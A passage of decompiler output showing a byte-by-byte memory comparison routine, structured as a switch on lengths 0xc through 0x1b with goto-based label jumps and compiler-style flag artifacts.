									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L401;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L399;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L397;
						case 0xc:
							L143:
							__edx =  *(__eax - 0xc);
							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
								__esi = 0;
								L153:
								if(__esi != 0) {
									goto L98;
								}
								goto L154;
							}
							__edx =  *(__ecx - 0xc) & 0x000000ff;
							__esi =  *(__eax - 0xc) & 0x000000ff;
							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
							if(__esi == 0) {
								L146:
								__esi =  *(__eax - 0xb) & 0x000000ff;
								__edx =  *(__ecx - 0xb) & 0x000000ff;
								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
								if(__esi == 0) {
									L148:
									__esi =  *(__eax - 0xa) & 0x000000ff;
									__edx =  *(__ecx - 0xa) & 0x000000ff;
									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
									if(__esi == 0) {
										L150:
										__esi =  *(__eax - 9) & 0x000000ff;
										__edx =  *(__ecx - 9) & 0x000000ff;
										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L153;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L150;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L148;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L146;
						case 0xd:
							L223:
							__edx =  *(__eax - 0xd);
							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
								__esi = 0;
								L233:
								if(__esi != 0) {
									goto L98;
								}
								goto L234;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xd) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
							if(__esi == 0) {
								L226:
								__esi =  *(__eax - 0xc) & 0x000000ff;
								__edx =  *(__ecx - 0xc) & 0x000000ff;
								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
								if(__esi == 0) {
									L228:
									__esi =  *(__eax - 0xb) & 0x000000ff;
									__edx =  *(__ecx - 0xb) & 0x000000ff;
									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
									if(__esi == 0) {
										L230:
										__esi =  *(__eax - 0xa) & 0x000000ff;
										__edx =  *(__ecx - 0xa) & 0x000000ff;
										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L233;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L230;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L228;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L226;
						case 0xe:
							L302:
							__edx =  *(__eax - 0xe);
							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
								__esi = 0;
								L312:
								if(__esi != 0) {
									goto L98;
								}
								goto L313;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xe) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
							if(__esi == 0) {
								L305:
								__esi =  *(__eax - 0xd) & 0x000000ff;
								__edx =  *(__ecx - 0xd) & 0x000000ff;
								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
								if(__esi == 0) {
									L307:
									__esi =  *(__eax - 0xc) & 0x000000ff;
									__edx =  *(__ecx - 0xc) & 0x000000ff;
									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
									if(__esi == 0) {
										L309:
										__esi =  *(__eax - 0xb) & 0x000000ff;
										__edx =  *(__ecx - 0xb) & 0x000000ff;
										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L312;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L309;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L307;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L305;
						case 0xf:
							L383:
							__edx =  *(__eax - 0xf);
							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
								__esi = 0;
								L393:
								if(__esi != 0) {
									goto L98;
								}
								goto L394;
							}
							__edx =  *(__ecx - 0xf) & 0x000000ff;
							__esi =  *(__eax - 0xf) & 0x000000ff;
							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
							if(__esi == 0) {
								L386:
								__esi =  *(__eax - 0xe) & 0x000000ff;
								__edx =  *(__ecx - 0xe) & 0x000000ff;
								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
								if(__esi == 0) {
									L388:
									__esi =  *(__eax - 0xd) & 0x000000ff;
									__edx =  *(__ecx - 0xd) & 0x000000ff;
									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
									if(__esi == 0) {
										L390:
										__esi =  *(__eax - 0xc) & 0x000000ff;
										__edx =  *(__ecx - 0xc) & 0x000000ff;
										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L393;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L390;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L388;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L386;
						case 0x10:
							L132:
							__edx =  *(__eax - 0x10);
							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
								__esi = 0;
								L142:
								if(__esi != 0) {
									goto L98;
								}
								goto L143;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x10) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
							if(__esi == 0) {
								L135:
								__esi =  *(__eax - 0xf) & 0x000000ff;
								__edx =  *(__ecx - 0xf) & 0x000000ff;
								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
								if(__esi == 0) {
									L137:
									__esi =  *(__eax - 0xe) & 0x000000ff;
									__edx =  *(__ecx - 0xe) & 0x000000ff;
									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
									if(__esi == 0) {
										L139:
										__esi =  *(__eax - 0xd) & 0x000000ff;
										__edx =  *(__ecx - 0xd) & 0x000000ff;
										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L142;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L139;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L137;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L135;
						case 0x11:
							L212:
							__edx =  *(__eax - 0x11);
							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
								__esi = 0;
								L222:
								if(__esi != 0) {
									goto L98;
								}
								goto L223;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x11) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
							if(__esi == 0) {
								L215:
								__esi =  *(__eax - 0x10) & 0x000000ff;
								__edx =  *(__ecx - 0x10) & 0x000000ff;
								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
								if(__esi == 0) {
									L217:
									__esi =  *(__eax - 0xf) & 0x000000ff;
									__edx =  *(__ecx - 0xf) & 0x000000ff;
									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
									if(__esi == 0) {
										L219:
										__esi =  *(__eax - 0xe) & 0x000000ff;
										__edx =  *(__ecx - 0xe) & 0x000000ff;
										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L222;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L219;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L217;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L215;
						case 0x12:
							L291:
							__edx =  *(__eax - 0x12);
							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
								__esi = 0;
								L301:
								if(__esi != 0) {
									goto L98;
								}
								goto L302;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x12) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
							if(__esi == 0) {
								L294:
								__esi =  *(__eax - 0x11) & 0x000000ff;
								__edx =  *(__ecx - 0x11) & 0x000000ff;
								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
								if(__esi == 0) {
									L296:
									__esi =  *(__eax - 0x10) & 0x000000ff;
									__edx =  *(__ecx - 0x10) & 0x000000ff;
									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
									if(__esi == 0) {
										L298:
										__esi =  *(__eax - 0xf) & 0x000000ff;
										__edx =  *(__ecx - 0xf) & 0x000000ff;
										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L301;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L298;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L296;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L294;
						case 0x13:
							L372:
							__edx =  *(__eax - 0x13);
							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
								__esi = 0;
								L382:
								if(__esi != 0) {
									goto L98;
								}
								goto L383;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x13) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
							if(__esi == 0) {
								L375:
								__esi =  *(__eax - 0x12) & 0x000000ff;
								__edx =  *(__ecx - 0x12) & 0x000000ff;
								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
								if(__esi == 0) {
									L377:
									__esi =  *(__eax - 0x11) & 0x000000ff;
									__edx =  *(__ecx - 0x11) & 0x000000ff;
									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
									if(__esi == 0) {
										L379:
										__esi =  *(__eax - 0x10) & 0x000000ff;
										__edx =  *(__ecx - 0x10) & 0x000000ff;
										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L382;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L379;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L377;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L375;
						case 0x14:
							L121:
							__edx =  *(__eax - 0x14);
							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
								__esi = 0;
								L131:
								if(__esi != 0) {
									goto L98;
								}
								goto L132;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x14) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
							if(__esi == 0) {
								L124:
								__esi =  *(__eax - 0x13) & 0x000000ff;
								__edx =  *(__ecx - 0x13) & 0x000000ff;
								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
								if(__esi == 0) {
									L126:
									__esi =  *(__eax - 0x12) & 0x000000ff;
									__edx =  *(__ecx - 0x12) & 0x000000ff;
									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
									if(__esi == 0) {
										L128:
										__esi =  *(__eax - 0x11) & 0x000000ff;
										__edx =  *(__ecx - 0x11) & 0x000000ff;
										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L131;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L128;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L126;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L124;
						case 0x15:
							L201:
							__edx =  *(__eax - 0x15);
							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
								__esi = 0;
								L211:
								if(__esi != 0) {
									goto L98;
								}
								goto L212;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x15) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
							if(__esi == 0) {
								L204:
								__esi =  *(__eax - 0x14) & 0x000000ff;
								__edx =  *(__ecx - 0x14) & 0x000000ff;
								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
								if(__esi == 0) {
									L206:
									__esi =  *(__eax - 0x13) & 0x000000ff;
									__edx =  *(__ecx - 0x13) & 0x000000ff;
									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
									if(__esi == 0) {
										L208:
										__esi =  *(__eax - 0x12) & 0x000000ff;
										__edx =  *(__ecx - 0x12) & 0x000000ff;
										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L211;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L208;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L206;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L204;
						case 0x16:
							L280:
							__edx =  *(__eax - 0x16);
							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
								__esi = 0;
								L290:
								if(__esi != 0) {
									goto L98;
								}
								goto L291;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x16) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
							if(__esi == 0) {
								L283:
								__esi =  *(__eax - 0x15) & 0x000000ff;
								__edx =  *(__ecx - 0x15) & 0x000000ff;
								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
								if(__esi == 0) {
									L285:
									__esi =  *(__eax - 0x14) & 0x000000ff;
									__edx =  *(__ecx - 0x14) & 0x000000ff;
									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
									if(__esi == 0) {
										L287:
										__esi =  *(__eax - 0x13) & 0x000000ff;
										__edx =  *(__ecx - 0x13) & 0x000000ff;
										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L290;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L287;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L285;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L283;
						case 0x17:
							L361:
							__edx =  *(__eax - 0x17);
							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
								__esi = 0;
								L371:
								if(__esi != 0) {
									goto L98;
								}
								goto L372;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x17) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
							if(__esi == 0) {
								L364:
								__esi =  *(__eax - 0x16) & 0x000000ff;
								__edx =  *(__ecx - 0x16) & 0x000000ff;
								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
								if(__esi == 0) {
									L366:
									__esi =  *(__eax - 0x15) & 0x000000ff;
									__edx =  *(__ecx - 0x15) & 0x000000ff;
									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
									if(__esi == 0) {
										L368:
										__esi =  *(__eax - 0x14) & 0x000000ff;
										__edx =  *(__ecx - 0x14) & 0x000000ff;
										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L371;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L368;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L366;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L364;
						case 0x18:
							L110:
							__edx =  *(__eax - 0x18);
							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
								__esi = 0;
								L120:
								if(__esi != 0) {
									goto L98;
								}
								goto L121;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x18) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
							if(__esi == 0) {
								L113:
								__esi =  *(__eax - 0x17) & 0x000000ff;
								__edx =  *(__ecx - 0x17) & 0x000000ff;
								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
								if(__esi == 0) {
									L115:
									__esi =  *(__eax - 0x16) & 0x000000ff;
									__edx =  *(__ecx - 0x16) & 0x000000ff;
									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
									if(__esi == 0) {
										L117:
										__esi =  *(__eax - 0x15) & 0x000000ff;
										__edx =  *(__ecx - 0x15) & 0x000000ff;
										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L120;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L117;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L115;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L113;
						case 0x19:
							L190:
							__edx =  *(__eax - 0x19);
							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
								__esi = 0;
								L200:
								if(__esi != 0) {
									goto L98;
								}
								goto L201;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x19) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
							if(__esi == 0) {
								L193:
								__esi =  *(__eax - 0x18) & 0x000000ff;
								__edx =  *(__ecx - 0x18) & 0x000000ff;
								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
								if(__esi == 0) {
									L195:
									__esi =  *(__eax - 0x17) & 0x000000ff;
									__edx =  *(__ecx - 0x17) & 0x000000ff;
									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
									if(__esi == 0) {
										L197:
										__esi =  *(__eax - 0x16) & 0x000000ff;
										__edx =  *(__ecx - 0x16) & 0x000000ff;
										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L200;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L197;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L195;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L193;
						case 0x1a:
							L269:
							__edx =  *(__eax - 0x1a);
							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
								__esi = 0;
								L279:
								if(__esi != 0) {
									goto L98;
								}
								goto L280;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L272:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi == 0) {
									L274:
									__esi =  *(__eax - 0x18) & 0x000000ff;
									__edx =  *(__ecx - 0x18) & 0x000000ff;
									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
									if(__esi == 0) {
										L276:
										__esi =  *(__eax - 0x17) & 0x000000ff;
										__edx =  *(__ecx - 0x17) & 0x000000ff;
										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L279;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L276;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L274;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L272;
						case 0x1b:
							L350:
							__edx =  *(__eax - 0x1b);
							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
								__esi = 0;
								L360:
								if(__esi != 0) {
									goto L98;
								}
								goto L361;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L353:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi == 0) {
									L355:
									__esi =  *(__eax - 0x19) & 0x000000ff;
									__edx =  *(__ecx - 0x19) & 0x000000ff;
									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
									if(__esi == 0) {
										L357:
										__esi =  *(__eax - 0x18) & 0x000000ff;
										__edx =  *(__ecx - 0x18) & 0x000000ff;
										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L360;
									}
									0 = 0 | __esi > 0x00000000;
